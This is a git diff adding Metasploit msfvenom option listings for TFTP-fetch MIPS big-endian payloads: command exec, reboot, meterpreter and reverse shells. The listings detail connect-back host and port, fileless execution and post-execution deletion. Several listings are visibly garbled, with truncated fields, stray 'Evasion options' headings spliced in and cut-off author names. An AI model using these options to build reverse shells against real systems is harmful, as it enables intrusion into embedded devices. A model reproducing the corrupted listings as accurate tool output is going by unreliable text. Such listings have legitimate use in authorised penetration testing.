SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-exec.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-exec.txt new file mode 100644 index 0000000..efa3092 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-exec.txt 
@@ -0,0 +1,69 @@ + + Name: TFTP Fetch, Linux Execute Command + Module: payload/cmd/linux/tftp/mipsbe/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + entropy + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME rotHNggWg no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + A very small shellcode for executing commands. + This module is sometimes helpful for testing purposes. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..1c4d2bf --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,100 @@ + + Name: TFTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 108 + Rank: Norm +Evasion options for payload/cmd/linux/tftp/mipsbe/meterpreter/reverse_tcp: +========================= + + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MLfxcUCsTA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_http.txt new file mode 100644 index 0000000..77e791d --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_http.txt 
@@ -0,0 +1,104 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_http: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME kGzVIZUQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_https.txt new file mode 100644 index 0000000..d0b72be --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_https.txt 
@@ -0,0 +1,106 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + B +Evasion options for payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_https: +========================= + +@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XduMWfjF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_tcp.txt new file mode 100644 index 0000000..7d058a3 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-meterpreter_reverse_tcp.txt 
@@ -0,0 +1,97 @@ + + Name: TFTP Fetch + Module: payload/cmd/linux/tftp/mipsbe/meterpreter_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + Brent Cook + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ywhTkSWGHccV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the 
functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-reboot.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-reboot.txt new file mode 100644 index 0000000..5b23016 --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-reboot.txt 
@@ -0,0 +1,69 @@ + + Name: TFTP Fetch, Linux Reboot + Module: payload/cmd/linux/tftp/mipsbe/reboot + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Michael Messner + rigan - + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME tDHUVUhvrxY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + + A very small shellcode for rebooting the system. + This payload is sometimes helpful for testing purposes or executing + other payloads that rely on initial startup procedures. 
+ + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell-reverse_tcp.txt new file mode 100644 index 0000000..5c78a01 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-tftp-mipsbe-shell-reverse_tcp.txt 
@@ -0,0 +1,91 @@ + + Name: TFTP Fetch, Linux Command Shell, Reverse TCP Stager + Module: payload/cmd/linux/tftp/mipsbe/shell/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + juan vazquez + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVONCE true yes Stop serving the payload after it is retrieved +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME MdRBdoFC no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an MIPSBE payload from a TFTP server. + Spawn a command shell (staged). + + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
